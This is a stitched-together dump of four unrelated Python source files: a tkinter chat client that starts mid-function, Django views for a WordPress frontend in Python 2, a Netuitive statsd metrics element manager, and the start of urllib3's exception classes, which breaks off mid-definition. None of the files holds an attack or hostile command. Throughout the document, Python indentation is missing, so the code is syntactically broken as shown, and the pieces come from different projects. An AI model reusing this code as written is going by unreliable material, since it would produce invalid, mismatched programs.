return(key,ID)
else:
return(0,0)
else:
return(0,0)
def send_msg(self,msg,tid):
sidstr = add_nulls(8,str(self.ID))
tidstr = add_nulls(8,str(tid))
kkey = add_nulls(8,str(self.key))
smsg = ("MSG"+sidstr+kkey+tidstr+msg+"FIN").encode("utf-8")
msglen = len(smsg)
t,sock = self.say_hello(msglen)
if(t==1):
sock.send(smsg)
answ = sock.recv(18)
answ = answ.decode("utf-8")
if(answ[:2]=="OK"):
return(1)
else:
return(0)
else:
return(0)
def get_messages(self):
kkey = add_nulls(8,str(self.key))
smsg = ("UPD"+kkey+"FIN").encode("utf-8")
msglen = len(smsg)
t,sock = self.say_hello(msglen)
if(t==1):
sock.send(smsg)
answ = sock.recv(18)
torec = 0
try:
answ=answ.decode("utf-8")
except:
return(0)
if(answ[:2]=="OK"):
try:
torec = int(answ[2:])
except:
return(0)
answ2 = sock.recv(torec)
to_ret = []
while(len(answ2)>4):
sender = int(answ2[:8].decode("utf-8"))
msglen = int(answ2[8:12].decode("utf-8"))
msg = answ2[12:12+msglen]
answ2 = answ2[12+msglen:]
to_ret.append((sender,msg))
return(to_ret)
else:
return(-1)
else:
return(0)
class prog_windowed:
def __init__(self):
self.aID = 0
self.curuid = 0
self.settings = settings()
self.chathist = history()
self.mw = tkinter.Tk()
self.mw.geometry("800x600")
servers = self.settings.get_all_servers()
if(servers==[]):
self.make_serv_adding()
else:
self.show_serverlist()
self.mw.mainloop()
def make_serv_adding(self):
try:
self.sl.destroy()
except:
pass
self.sadd = tkinter.Toplevel()
self.sadd.title("Add a server")
self.sadd.geometry("300x300")
self.l1 = tkinter.Label(self.sadd,text="Serv name")
self.l1.pack()
self.addname = tkinter.Entry(self.sadd)
self.addname.pack()
self.l2 = tkinter.Label(self.sadd,text="Serv addr")
self.l2.pack()
self.addaddr = tkinter.Entry(self.sadd)
self.addaddr.pack()
self.l3 = tkinter.Label(self.sadd,text="Serv port")
self.l3.pack()
self.addport = tkinter.Entry(self.sadd)
self.addport.pack()
self.l4 = tkinter.Label(self.sadd,text="Login")
self.l4.pack()
self.addlogin = tkinter.Entry(self.sadd)
self.addlogin.pack()
self.l5 = tkinter.Label(self.sadd,text="Password")
self.l5.pack()
self.addpwd = tkinter.Entry(self.sadd)
self.addpwd.pack()
self.acceptbtn = tkinter.Button(self.sadd,text="Save",command = self.save_serv)
self.acceptbtn.pack()
def save_serv(self):
sname = self.addname.get()
saddr = self.addaddr.get()
sport = self.addport.get()
slogin = self.addlogin.get()
spassw = self.addpwd.get()
self.settings.save_server(sname,saddr,sport,slogin,spassw)
self.sadd.destroy()
self.show_serverlist()
def show_serverlist(self):
self.sl = tkinter.Toplevel()
self.sl.title("Choose a server to connect")
self.sl.geometry("300x300")
self.servs = self.settings.get_all_servers()
self.l1 = tkinter.Label(self.sl,text = "Select a server from list")
self.l1.pack()
self.slist = tkinter.Listbox(self.sl)
for i in self.servs:
self.slist.insert(tkinter.END, i[1])
self.slist.pack()
self.cbtn = tkinter.Button(self.sl,text="Connect",command = self.connserv)
self.cbtn.pack()
self.abtn = tkinter.Button(self.sl,text="Add new server",command = self.make_serv_adding)
self.abtn.pack()
def connserv(self):
self.current_server = self.servs[int(self.slist.curselection()[0])]
self.sl.destroy()
self.connection = connection(self.current_server)
t = self.connection.check_connection()
if(t==0):
self.show_serverlist()
else:
self.make_ulist()
self.make_chatwindow()
def make_ulist(self):
allusers = self.chathist.get_all_users(self.current_server[0])
onlines = self.connection.get_users()
ulist = allusers
for i in onlines:
if(i not in ulist):
ulist.append(i)
self.ulist = ulist
self.writelist = []
for i in ulist:
if(i in onlines):
self.writelist.append(i+"(online)")
else:
self.writelist.append(i)
def make_chatwindow(self):
self.texts = tkinter.Text(self.mw)
self.texts.configure(width=60)
self.texts.place(x=10,y=10)
self.users = tkinter.Listbox(self.mw)
self.users.configure(height = 23)
self.users.place(x=600,y=10)
for u in self.writelist:
self.users.insert(tkinter.END,str(u))
self.users.bind("<Double-Button-1>",self.change_chat)
self.msgenter = tkinter.Entry(self.mw)
self.msgenter.configure(width=80)
self.msgenter.place(x=10,y=500)
self.msgenter.bind("<Return>",self.sendmsg)
self.l1 = tkinter.Label(self.mw,text="Message:")
self.l1.place(x=10,y=470)
self.sendbtn = tkinter.Button(self.mw,text="Send",command = self.sendmsg2)
self.sendbtn.place(x=500,y=497)
self.l2 = tkinter.Label(self.mw,text="Your ID is: "+str(self.connection.ID))
self.l2.place(x=10,y=550)
self.l2 = tkinter.Label(self.mw,text="Chat with: "+str(self.curuid))
self.l2.place(x=10,y=400)
self.aID = self.mw.after(100,self.check_chats)
def change_chat(self,pressed):
uid = self.ulist[int(self.users.curselection()[0])]
self.curuid = uid
self.l2.configure(text="Chat with: "+str(self.curuid))
self.check_chats()
def sendmsg2(self):
self.sendmsg(123)
def sendmsg(self,shit):
msg = self.msgenter.get()
t = self.connection.send_msg(msg,self.curuid)
if(t==1):
self.chathist.add_msg(self.curuid,self.current_server[0],0,msg.encode("utf-8"))
self.msgenter.delete("0",tkinter.END)
self.check_chats()
else:
return
def check_chats(self):
self.mw.after_cancel(self.aID)
uid = self.curuid
msgs = self.connection.get_messages()
if(type(msgs) == type([])):
for msg in msgs:
self.chathist.add_msg(msg[0],self.current_server[0],1,msg[1])
data = self.chathist.get_chat(self.curuid,self.current_server[0])
to_write = []
for msg in data:
outmsg = ""
if(msg[0]==0):
outmsg+="You: "
else:
outmsg+=str(self.curuid)+": "
try:
outmsg+=msg[1].decode("utf-8")
except:
outmsg+="blob data"
to_write.append(outmsg)
to_write.reverse()
stw = "\n".join(to_write)
check = self.texts.get("0.0",tkinter.END)
self.make_ulist()
self.users.delete('0',tkinter.END)
for u in self.writelist:
self.users.insert(tkinter.END,str(u))
if(check.replace("\n","")!=stw.replace("\n","")):
self.texts.delete('0.0',tkinter.END)
self.texts.insert(tkinter.END,stw)
self.aID = self.mw.after(10000,self.check_chats)
a = prog_windowed()
|
|
import os
from urllib import quote, unquote
from mimetypes import guess_type
from django.http import HttpResponse, Http404, HttpResponseBadRequest, HttpResponseRedirect, HttpResponsePermanentRedirect, HttpResponseServerError
from django.template import RequestContext, loader
from django.shortcuts import render_to_response, get_object_or_404
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.utils.translation import ugettext as _
from wp_frontman.blog import Blog
from wp_frontman.models import *
from wp_frontman.forms import CommentForm, UserCommentForm, LoginForm, RegistrationForm
from wp_frontman.feeds import *
from wp_frontman.cache import get_key, get_object_key, get_object_value, set_object_value
from wp_frontman.cache.view_decorators import wpf_cache_page
from wp_frontman.lib.utils import get_date_range, get_set, make_tree
from wp_frontman.lib.wp_password_hasher import hash_password
WPF_SENDFILE = Blog.site.use_sendfile
WPF_WP_ROOT = Blog.site.wp_root
WPF_CATEGORIES_AS_SETS = Blog.site.categories_as_sets
def page_to_limits(page, num):
if page is None:
return 1, 0, num
try:
page = int(page)
except (TypeError, ValueError):
return 1, 0, num
return page, (page-1)*num, (page-1)*num+num
def simple_paginator_vars(page, has_next, pattern_name, kw=None):
kw = kw or dict()
page_previous_url = page_next_url = None
page_next = None
page_previous = None if page == 1 else page - 1
if page_previous == 1:
page_previous_url = reverse(pattern_name, kwargs=kw)
if not page_previous_url.endswith('/'):
page_previous_url + '/'
elif page_previous > 1:
kw['page'] = page_previous
page_previous_url = reverse(pattern_name, kwargs=kw)
if has_next:
kw['page'] = page_next = page + 1
page_next_url = reverse(pattern_name, kwargs=kw)
return dict(
page=page, page_previous=page_previous, page_next=page_next,
page_previous_url=page_previous_url, page_next_url=page_next_url
)
@wpf_cache_page(timestamps=('__all__',))
def index(request, page=None):
if request.GET.get('preview') and request.GET.get('p'):
# find out if the user can access this preview
user = User.user_from_cookie(request)
# TODO: verify nonce and /or check user capabilities
if user or settings.DEBUG:
try:
post = BasePost.objects.get(id=request.GET.get('p'), post_type='post', status='draft')
except ObjectDoesNotExist:
pass
else:
request._cache_store_result = False
return _post(request, post, None, 'wp_frontman/post.html')
if 'q' in request.GET:
q = request.GET['q']
if q is None or not q.strip():
return HttpResponseRedirect(reverse('wpf_index'))
return HttpResponseRedirect(reverse('wpf_search', kwargs=dict(q=q)))
page, start, end = page_to_limits(page, request.blog.posts_per_page)
posts = list(Post.objects.published().select_related('author')[start:end+1])
if len(posts) > request.blog.posts_per_page:
posts = posts[:-1]
has_next = True
else:
has_next = False
if posts:
Post.fill_taxonomy_cache(posts)
return render_to_response(
'wp_frontman/index.html',
dict(posts=posts, **simple_paginator_vars(page, has_next, 'wpf_index')),
context_instance=RequestContext(request)
)
@wpf_cache_page(timestamps=('post', 'comment')) # don't care too much if the sidebar gets stale
def post(request, **kw):
post = revision = None
preview_id = request.GET.get('preview_id')
if preview_id and request.GET.get('preview'):
# checking the login first saves us a database request if we have no logged in user
user_data = User.login_from_cookie(request)
user = None if user_data is None else User.user_from_cookie(request, *user_data)
if user:
if request.GET.get('preview_nonce'):
if User.verify_nonce(request, request.GET['preview_nonce'], 'post_preview_%s' % preview_id):
# ok, we have a preview id
revision = preview_id
else:
revision = preview_id
# check the cache
if not revision:
key = get_object_key(request.blog.blog_id, 'post', kw)
post = get_object_value(request.blog.blog_id, key, ('post', 'comment_post'))
if post is None:
try:
post = Post.objects.get_from_keywords(kw)
except ObjectDoesNotExist:
raise Http404("No such post.")
except DuplicatePermalink, e:
return HttpResponsePermanentRedirect(e.args[0])
if post.status == 'future':
user = User.user_from_cookie(request)
if not user:
raise Http404("Not allowed")
request._cache_store_result = False
elif post and post.comment_status == 'open' and not revision:
set_object_value(key, post)
if revision:
post.set_to_revision(revision)
return _post(
request, post, kw.get('comment_page'),
('wp_frontman/post_%s.html' % post.slug, 'wp_frontman/post.html')
)
@wpf_cache_page(timestamps=('page', 'comment')) # don't care too much if the sidebar gets stale
def page(request, slug, comment_page=None):
# stupid WordPress does not enforce unique slugs
pages = Page.objects.filter(status__in=('publish', 'future')).select_related('author').filter(slug=slug, status='publish').order_by('-date')
if not pages:
raise Http404(_("No such page."))
page = pages[0]
if page.status == 'future':
user = User.user_from_cookie(request)
if not user:
raise Http404("Not allowed")
return _post(
request, page, comment_page,
('wp_frontman/page_%s.html' % slug, 'wp_frontman/page.html')
)
def _post(request, post, comment_page, templates):
if post.comment_status == 'open' or post.status != 'publish':
# prevent storing the response in the cache if we have to display the comment form
request._cache_store_result = False
comment_error = None
form = None
needs_login = False
try:
user_login, expiration, _hmac = User.login_from_cookie(request)
except (TypeError, ValueError):
user_login = user = None
else:
user = User.user_from_cookie(request, user_login, expiration, _hmac)
if not user:
user_login = None
if post.comment_status == 'open':
if request.method == 'POST':
data = request.POST.copy()
data['comment_parent'] = data.get('comment_parent') or request.GET.get('replytocom')
#user = None if not user_login else User.user_from_cookie(request)
if user:
form = UserCommentForm(data)
elif request.blog.comment_registration:
# set the flag that tells our template to display the login/register fragment
user_login = False
needs_login = True
else:
user_login = False
form = CommentForm(data)
if form and form.is_valid():
try:
comment = form.save(request, post, user)
except ValueError, e:
#import sys
#import traceback
#file('/tmp/wpf_comment_error.log', 'a+').write(" ".join(traceback.format_tb(sys.exc_info()[2])) + "\n\n")
comment_error = _('Cannot post this comment') if not e.args else "Error when saving: %s" % e.args[0]
else:
data = form.cleaned_data
response = HttpResponse()
if data.get('remember_info'):
path = reverse('wpf_index')
for k in ('author', 'author_email', 'author_url'):
v = data.get(k)
if v:
response.set_cookie('comment_%s_%s' % (k, request.blog.cookiehash), value=v.encode('utf-8'), path=path)
response.status_code = 302
if comment.approved == '1':
response['Location'] = comment.get_absolute_url()
else:
response['Location'] = post.get_absolute_url() + '#comments'
return response
elif form and form['rawcontent'].errors:
comment_error = _("Invalid or empty content")
else:
# only check that we have a cookie now, save querying the database
# for when we have POST data
if user_login:
form = UserCommentForm()
elif request.blog.comment_registration:
# set the flag that tells our template to display the login/register fragment
needs_login = True
else:
# show the default comment form
initial = dict()
if getattr(settings, 'WPF_COMMENTFORM_SET_INITIAL', True):
for k in initial.keys():
v = request.COOKIES.get("comment_%s_%s" % (k, request.blog.cookiehash))
if v:
initial[k] = unquote(v)
form = CommentForm(initial=initial)
#return render_to_response(
response = HttpResponse(loader.render_to_string(
templates,
dict(
post=post, form=form, comment_error=comment_error,
page=comment_page, user_login=user_login, needs_login=needs_login
),
context_instance=RequestContext(request)
))
if post.ping_status == 'open' and request.blog.pingback_url:
response['X-Pingback'] = request.blog.pingback_url
return response
def trackback(request, **kw):
pass
def _listing(request, obj, qs, page, templates, d, paginator_args):
page, start, end = page_to_limits(page, request.blog.posts_per_page)
posts = list(qs[start:end+1])
if len(posts) > request.blog.posts_per_page:
posts = posts[:-1]
has_next = True
else:
has_next = False
if posts:
Post.fill_taxonomy_cache(posts)
d['posts'] = posts
d['obj'] = obj
d.update(simple_paginator_vars(page, has_next, *paginator_args))
return render_to_response(templates, d, context_instance=RequestContext(request))
@wpf_cache_page(timestamps=('post',))
def archives(request, year, month=None, page=None):
label = year.rjust(4, '0')
if month:
label += month.rjust(2, '0')
try:
if month:
dt_start, dt_end = get_date_range(year=year, month=month)
else:
dt_start, dt_end = get_date_range(year=year)
except (TypeError, ValueError):
raise Http404(_("No such archive."))
qs = Post.objects.published().select_related('author').filter(date__range=(dt_start, dt_end))
d = dict(year=year, month=month, label=label, dt_start=dt_start, dt_end=dt_end)
paginator_d = dict(year=year)
if month:
paginator_d['month'] = month
return _listing(
request, d, qs, page, 'wp_frontman/archives.html',
d,
('wpf_archives', paginator_d)
)
@wpf_cache_page(timestamps=('post', 'page'))
def author(request, slug, page=None):
author = get_object_or_404(User, nicename=slug)
qs = author.basepost_set.posts().published().select_related('author')
return _listing(
request, author, qs, page,
('wp_frontman/author_%s.html' % slug, 'wp_frontman/author.html'),
dict(author=author),
('wpf_author', dict(slug=slug))
)
@wpf_cache_page(timestamps=('post',))
def category(request, slug, parents=None, page=None):
slugs = [slug, quote(slug.encode('utf-8'))]
slugs.append(slugs[-1].lower())
if parents and WPF_CATEGORIES_AS_SETS:
_parents = [t for t in parents.split('/') if t]
for i, p in enumerate(_parents):
if '%' in p:
_parents[i] = unquote(p).decode('utf-8')
parents_tree = Category.get_all(as_tree=True)
branch = parents_tree
for p in _parents:
pq = quote(p.encode('utf-8'))
try:
root, branch = [(k, v) for k, v in branch.items() if k.term.slug in (p, pq, pq.lower())][0]
except IndexError:
raise Http404("No such category path.")
if branch is None:
break
try:
category = [c for c in branch if c.term.slug in slugs][0]
except IndexError:
raise Http404("No such category.")
else:
categories = Category.objects.select_related('term').filter(term__slug__in=slugs)
if not categories:
raise Http404("No such category.")
category = categories[0]
if WPF_CATEGORIES_AS_SETS:
categories = [c.id for c in get_set(Category.objects.select_related('parent'), 'id', category.id)]
qs = Post.objects.published().select_related('author').filter(base_taxonomy__id__in=categories)
else:
qs = category.posts.published().select_related('author')
qs = qs.distinct()
paginator_args = dict(slug=slug) if not parents or not WPF_CATEGORIES_AS_SETS else dict(slug=slug, parents=parents)
return _listing(
request, category, qs, page,
('wp_frontman/category_%s.html' % slug, 'wp_frontman/category.html'),
dict(category=category),
('wpf_category', paginator_args)
)
@wpf_cache_page(timestamps=('post',))
def taxonomy(request, taxonomy, slug, parents=None, page=None):
# TODO: should probably make this more general and use it also for built-in taxonomies
blog = Blog.get_active()
custom_taxonomies = blog.options.get('wp_frontman', dict()).get('custom_taxonomies', dict())
taxonomy_data = custom_taxonomies.get(taxonomy)
if not custom_taxonomies.get('enabled') or not taxonomy_data:
raise Http404("No such taxonomy.")
slugs = [slug, quote(slug.encode('utf-8'))]
slugs.append(slugs[-1].lower())
"""
if parents and taxonomy_data['rewrite_hierarchical']:
_parents = [t for t in parents.split('/') if t]
for i, p in enumerate(_parents):
if '%' in p:
_parents[i] = unquote(p).decode('utf-8')
parents_tree = Category.get_all(as_tree=True)
branch = parents_tree
for p in _parents:
pq = quote(p.encode('utf-8'))
try:
root, branch = [(k, v) for k, v in branch.items() if k.term.slug in (p, pq, pq.lower())][0]
except IndexError:
raise Http404("No such category path.")
if branch is None:
break
try:
category = [c for c in branch if c.term.slug in slugs][0]
except IndexError:
raise Http404("No such category.")
else:
categories = Category.objects.select_related('term').filter(term__slug__in=slugs)
if not categories:
raise Http404("No such category.")
category = categories[0]
if WPF_CATEGORIES_AS_SETS:
categories = [c.id for c in get_set(Category.objects.select_related('parent'), 'id', category.id)]
qs = Post.objects.published().select_related('author').filter(base_taxonomy__id__in=categories)
else:
qs = category.posts.published().select_related('author')
qs = qs.distinct()
paginator_args = dict(slug=slug) if not parents or not WPF_CATEGORIES_AS_SETS else dict(slug=slug, parents=parents)
return _listing(
request, category, qs, page,
('wp_frontman/category_%s.html' % slug, 'wp_frontman/category.html'),
dict(category=category),
('wpf_category', paginator_args)
)
"""
#@wpf_cache_page(timestamps=('link_category',))
def links(request, slug, parents=None, page=None):
slugs = [slug, quote(slug.encode('utf-8'))]
slugs.append(slugs[-1].lower())
if parents:
_parents = [t for t in parents.split('/') if t]
for i, p in enumerate(_parents):
if '%' in p:
_parents[i] = unquote(p).decode('utf-8')
parents_tree = LinkCategory.get_all(as_tree=True)
branch = parents_tree
for p in _parents:
pq = quote(p.encode('utf-8'))
try:
root, branch = [(k, v) for k, v in branch.items() if k.term.slug in (p, pq, pq.lower())][0]
except IndexError:
raise Http404("No such link category path.")
if branch is None:
break
try:
category = [c for c in branch if c.term.slug in slugs][0]
except IndexError:
raise Http404("No such link category.")
else:
categories = LinkCategory.objects.select_related('term').filter(term__slug__in=slugs)
if not categories:
raise Http404("No such link category.")
category = categories[0]
#qs = category.links.visible().select_related('author')
categories = [c.id for c in get_set(LinkCategory.objects.select_related('parent'), 'id', category.id)]
qs = Link.objects.visible().filter(categories__id__in=categories).order_by('name')
page, start, end = page_to_limits(page, request.blog.posts_per_page)
links = list(qs[start:end+1])
if len(links) > request.blog.posts_per_page:
links = links[:-1]
has_next = True
else:
has_next = False
d = dict(category=category, links=links)
d.update(simple_paginator_vars(page, has_next, 'wpf_link_category', dict(slug=slug) if not parents else dict(slug=slug, parents=parents)))
return render_to_response(
('wp_frontman/links_%s.html' % slug, 'wp_frontman/links.html'),
d,
context_instance=RequestContext(request)
)
@wpf_cache_page(timestamps=('post',))
def tag(request, slug, page=None):
_slug = quote(slug.encode('utf-8'))
tags = Tag.objects.select_related('term').filter(term__slug__in=(slug, slug.lower(), _slug, _slug.lower()))
if not tags:
raise Http404("No such tag.")
tag = tags[0]
#try:
# tag = Tag.objects.select_related('term').get(term__slug=slug)
#except ObjectDoesNotExist:
# raise Http404("No such tag.")
qs = tag.posts.published().select_related('author')
return _listing(
request, tag, qs, page,
('wp_frontman/tag_%s.html' % slug, 'wp_frontman/tag.html'),
dict(tag=tag),
('wpf_post_tag', dict(slug=slug))
)
@wpf_cache_page(timestamps=('post',))
def search(request, q=None, page=None):
q = q or request.GET.get('q')
if q:
qs = Post.objects.published().filter(models.Q(title__icontains=q)|models.Q(content__icontains=q)).select_related('author')
else:
qs = list()
return _listing(
request, q, qs, page,
'wp_frontman/search.html',
dict(q=q),
('wpf_search', dict(q=q))
)
def feed_check_redirect(request, feed_type=None):
options = Blog.get_active().options.get('wp_frontman', dict()).get('feedburner', dict())
enabled = options.get('enabled')
url = options.get('url' if not feed_type else '%s_url' % feed_type)
feedburner_agent = 'feedburner' in request.META.get('HTTP_USER_AGENT', '').lower()
if not enabled or not url or feedburner_agent:
func = globals().get('feed' if not feed_type else 'feed_%s' % feed_type)
return func(request)
return HttpResponseRedirect(url)
@wpf_cache_page(timestamps=('post',))
def feed(request, feed_type='atom'):
return posts_feed(request)
def feed_post(request, **kw):
try:
post = Post.objects.get_from_keywords(kw)
except ObjectDoesNotExist:
raise Http404("No such post.")
return post_feed(request, post)
@wpf_cache_page(timestamps=('comment',))
def feed_comments(request, feed_type='atom'):
return comments_feed(request)
@wpf_cache_page(timestamps=('post',))
def feed_author(request, **kw):
return user_feed(request, **kw)
def user_login(request):
if request.method == 'POST':
data = request.POST.copy()
form = LoginForm(data)
if form.is_valid():
redirect_to = request.GET.get('redirect_to')
if not redirect_to:
redirect_to = reverse('wpf_index')
response = HttpResponseRedirect(redirect_to)
user = form.cleaned_data['user']
cookie = user.get_logged_in_cookie()
if cookie:
if not form.cleaned_data['rememberme']:
cookie['max_age'] = None
response.set_cookie(**cookie)
return response
else:
form = LoginForm()
return render_to_response(
'wp_frontman/user_login.html',
dict(form=form),
context_instance=RequestContext(request)
)
def user_logout(request):
redirect_to = request.GET.get('redirect_to')
if not redirect_to:
redirect_to = reverse('wpf_index')
response = HttpResponseRedirect(redirect_to)
for cookie in request.COOKIES:
if cookie.startswith('wordpress_logged_in'):
response.delete_cookie(cookie) #'wordpress_logged_in_%s' % Blog.site.siteurl_hash)
return response
def user_registration(request):
if request.method == 'POST':
data = request.POST.copy()
form = RegistrationForm(data)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('wpf_user_registration_message'))
else:
form = RegistrationForm()
return render_to_response(
'wp_frontman/user_registration.html',
dict(form=form),
context_instance=RequestContext(request)
)
def user_registration_message(request):
return render_to_response(
'wp_frontman/user_registration_message.html',
dict(),
context_instance=RequestContext(request)
)
def user_activation(request):
activation_key = request.POST.get('key', request.GET.get('key'))
if activation_key:
try:
s = UserSignup.objects.get(activation_key=activation_key, registered__gte=datetime.datetime.now() - datetime.timedelta(days=2))
except ObjectDoesNotExist:
pass
else:
# create user, mark signup as registered, and redirect to the user's profile
user = s.activate()
response = HttpResponseRedirect(reverse('wpf_user_profile'))
response.set_cookie(**user.get_logged_in_cookie())
return response
return render_to_response(
'wp_frontman/user_activation.html',
dict(activation_key=activation_key),
context_instance=RequestContext(request)
)
def user_profile(request):
user = User.user_from_cookie(request)
if not user:
return HttpResponseRedirect(reverse('wpf_user_login'))
return render_to_response(
'wp_frontman/user_profile.html',
dict(user=User.user_from_cookie(request)),
context_instance=RequestContext(request)
)
def media(request, filepath):
if filepath[-1] == '/':
filepath = filepath[:-1]
return _static_media(request, 'wp-content/blogs.dir/%s/files/%s' % (request.blog.blog_id, filepath))
def _static_media(request, path):
if '..' in path:
return HttpResponseBadRequest("File path forbidden")
if not WPF_WP_ROOT:
return HttpResponseServerError("Missing WPF_WP_ROOT setting")
if path and path[0] == '/':
# relative path, strip leading slash
path = path[1:]
abspath = os.path.join(WPF_WP_ROOT, path)
mimetype = guess_type(abspath)
if not mimetype[0]:
return HttpResponseBadRequest("Unknown mimetype")
if isinstance(abspath, unicode):
abspath = abspath.encode('utf-8')
if WPF_SENDFILE and not settings.DEBUG:
# return the appropriate headers
response = HttpResponse(mimetype=mimetype[0])
response['X-Sendfile'] = abspath
return response
if not os.path.isfile(abspath):
raise Http404("No such file %s" % abspath)
return HttpResponse(file(abspath, 'rb'), mimetype=mimetype[0])
def favicon(request):
return _static_media(request, request.blog.options['favicon_path'])
def robots(request):
return _static_media(request, request.blog.options['robots_path'])
#def feed_category(request, category, feed_type='atom'):
# pass
#def feed_search(request, search, feed_type='atom'):
# pass
#def feed_tag(request, tag, feed_type='atom'):
# pass
|
|
import logging
import netuitive
from . import statsd
logger = logging.getLogger(__name__)
class Elements(object):
""" manage list of elements
"""
def __init__(self, hostname, element_obj):
self.hostname = hostname
self.element = element_obj
self.elements = {}
self.elements[self.hostname] = self.element
def add(self, metricId, ts, val, metricType, sign=None, rate=None,
tags=[], elementId=None):
""" add an element (if needed), metrics, and samples
"""
logger.debug('Element.add for metricId: {0}, '
'ts: {1},'
'val: {2}, '
'metricType:{3}, '
'sign: {4}, '
'rate: {5}, '
'tags: {6}, '
'elementId: {7}'.format(str(metricId),
str(ts),
str(val),
str(metricType),
str(sign),
str(rate),
str(tags),
str(elementId)))
try:
timestamp = int(ts)
value = float(val)
if elementId is None:
elementId = self.hostname
if elementId not in self.elements:
logger.debug('creating element:' + str(elementId))
self.elements[elementId] = Element(
elementId, self.element.element.type)
self.elements[elementId].add_sample(
metricId, timestamp, value, metricType, sign, rate, tags)
except Exception as e:
logger.error(e, exc_info=True)
raise(e)
def delete(self, elementId):
del self.elements[elementId]
def delete_all(self):
self.elements = {}
self.element.metrics = {}
self.elements[self.hostname] = self.element
def clear_samples(self, elementId=None, everything=False):
logger.debug('Element.clear_samples for ' + str(elementId))
try:
if elementId is None and everything is True:
for ename in self.elements:
e = self.elements[ename]
e.clear_samples()
else:
e = self.elements[elementId]
e.clear_samples()
except Exception as e:
logger.error(e, exc_info=True)
class Element(object):
"""
An entity that represents an element
"""
def __init__(self, elementId, ElementType=None):
logger.debug('__init__ for Element')
self.element = netuitive.Element(ElementType)
self.elementId = elementId
self.metrics = {}
self.metric_types = {'c': 'COUNTER',
'g': 'GAUGE',
'ms': 'TIMER',
's': 'SET',
'h': 'HISTOGRAM'}
def add_attribute(self, name, value):
self.element.add_attribute(name, value)
def add_tag(self, name, value):
self.element.add_tag(name, value)
def clear_samples(self):
self.metrics.clear()
self.element.clear_samples()
def add_sample(self, metricId, ts, value, metricType, sign=None,
rate=None, tags=[]):
logger.debug('add_sample')
unit = ''
sparseDataStrategy = 'None'
metric_tags = []
try:
timestamp = int(ts)
mtype = self.metric_types[metricType]
# process tags
for t in tags:
# check for unit tag
if 'un' in t:
unit = t['un']
metric_tags.append(t)
# check for sparse data tag
elif 'sds' in t:
sparseDataStrategy = t['sds']
metric_tags.append(t)
# check for element type
elif 'ty' in t:
self.element.type = t['ty']
# check for application version
elif 'v' in t:
# Overwrite an existing version tag
if any(tag.name == 'app.version'
for tag in self.element.tags):
index = next(i for i, tag in enumerate(
self.element.tags) if tag.name == 'app.version')
del self.element.tags[index]
self.element.add_tag('app.version', t['v'])
else:
metric_tags.append(t)
del tags
if metricId in self.metrics:
if mtype not in self.metrics[metricId].orgtype:
otype = self.metric_types[
self.metrics[metricId].tags[0]['statsdType']]
logger.error("metric {0} changed from type {1} "
"to type {2}".format(metricId, otype, mtype))
del self.metrics[metricId]
if mtype == 'GAUGE':
if metricId not in self.metrics:
self.metrics[metricId] = statsd.Gauge(
metricId, sparseDataStrategy, unit, metric_tags)
self.metrics[metricId].add_value(value, timestamp, sign)
if mtype == 'COUNTER':
if metricId not in self.metrics:
self.metrics[metricId] = statsd.Counter(
metricId, sparseDataStrategy, unit, metric_tags)
self.metrics[metricId].add_value(
value, timestamp, rate, sign)
if mtype == 'HISTOGRAM' or mtype == 'TIMER':
if metricId not in self.metrics:
self.metrics[metricId] = statsd.Histogram(
metricId, sparseDataStrategy, unit, metric_tags)
self.metrics[metricId].add_value(
value, timestamp)
if mtype == 'SET':
if metricId not in self.metrics:
self.metrics[metricId] = statsd.Set(
metricId, sparseDataStrategy, unit, metric_tags)
self.metrics[metricId].add_value(value, timestamp)
except Exception as e:
logger.error(e, exc_info=True)
print(e)
raise(e)
def prepare(self):
"""
prepare the metrics/samples for posting to the api
"""
try:
logger.debug('starting prepare')
for m in self.metrics:
metric = self.metrics[m]
samples = metric.get_values(statsd.util.get_timestamp())
metricType = metric.metricType
sparseDataStrategy = metric.sparseDataStrategy
unit = metric.unit
tags = metric.tags
if len(tags) == 0:
tags = None
for name in samples:
d = samples[name]
mmin = None
mmax = None
mavg = None
msum = None
mcnt = None
timestamp = d['timestamp']
value = d['value']
if 'min' in d:
mmin = d['min']
if 'max' in d:
mmax = d['max']
if 'avg' in d:
mavg = d['avg']
if 'sum' in d:
msum = d['sum']
if 'cnt' in d:
mcnt = d['cnt']
self.element.add_sample(
name,
timestamp,
value,
metricType,
self.elementId,
sparseDataStrategy,
unit,
tags,
mmin,
mmax,
mavg,
msum,
mcnt,
ts_is_ms=True)
# since our results are ready for posting
metric.clear()
logger.debug('finished prepare')
except Exception as e:
raise(e)
|
|
import socket
import warnings
from email.errors import MessageDefect
from http.client import IncompleteRead as httplib_IncompleteRead
from typing import TYPE_CHECKING, Callable, List, Optional, Tuple, Union
if TYPE_CHECKING:
from .connection import HTTPConnection
from .connectionpool import ConnectionPool
from .response import HTTPResponse
from .util.retry import Retry
# Base Exceptions
class HTTPError(Exception):
"""Base exception used by this module."""
pass
class HTTPWarning(Warning):
"""Base warning used by this module."""
pass
_TYPE_REDUCE_RESULT = Tuple[Callable[..., object], Tuple[object, ...]]
class PoolError(HTTPError):
"""Base exception for errors caused within a pool."""
def __init__(self, pool: "ConnectionPool", message: str) -> None:
self.pool = pool
super().__init__(f"{pool}: {message}")
def __reduce__(self) -> _TYPE_REDUCE_RESULT:
# For pickling purposes.
return self.__class__, (None, None)
class RequestError(PoolError):
"""Base exception for PoolErrors that have associated URLs."""
def __init__(self, pool: "ConnectionPool", url: str, message: str) -> None:
self.url = url
super().__init__(pool, message)
def __reduce__(self) -> _TYPE_REDUCE_RESULT:
# For pickling purposes.
return self.__class__, (None, self.url, None)
class SSLError(HTTPError):
"""Raised when SSL certificate fails in an HTTPS connection."""
pass
class ProxyError(HTTPError):
"""Raised when the connection to a proxy fails."""
# The original error is also available as __cause__.
original_error: Exception
def __init__(self, message: str, error: Exception) -> None:
super().__init__(message, error)
self.original_error = error
class DecodeError(HTTPError):
"""Raised when automatic decoding based on Content-Type fails."""
pass
class ProtocolError(HTTPError):
"""Raised when something unexpected happens mid-request/response."""
pass
#: Renamed to ProtocolError but aliased for backwards compatibility.
ConnectionError = ProtocolError
# Leaf Exceptions
class MaxRetryError(RequestError):
"""Raised when the maximum number of retries is exceeded.
:param pool: The connection pool
:type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool`
:param string url: The requested Url
:param exceptions.Exception reason: The underlying error
"""
def __init__(
self, pool: "ConnectionPool", url: str, reason: Optional[Exception] = None
) -> None:
self.reason = reason
message = f"Max retries exceeded with url: {url} (Caused by {reason!r})"
super().__init__(pool, url, message)
class HostChangedError(RequestError):
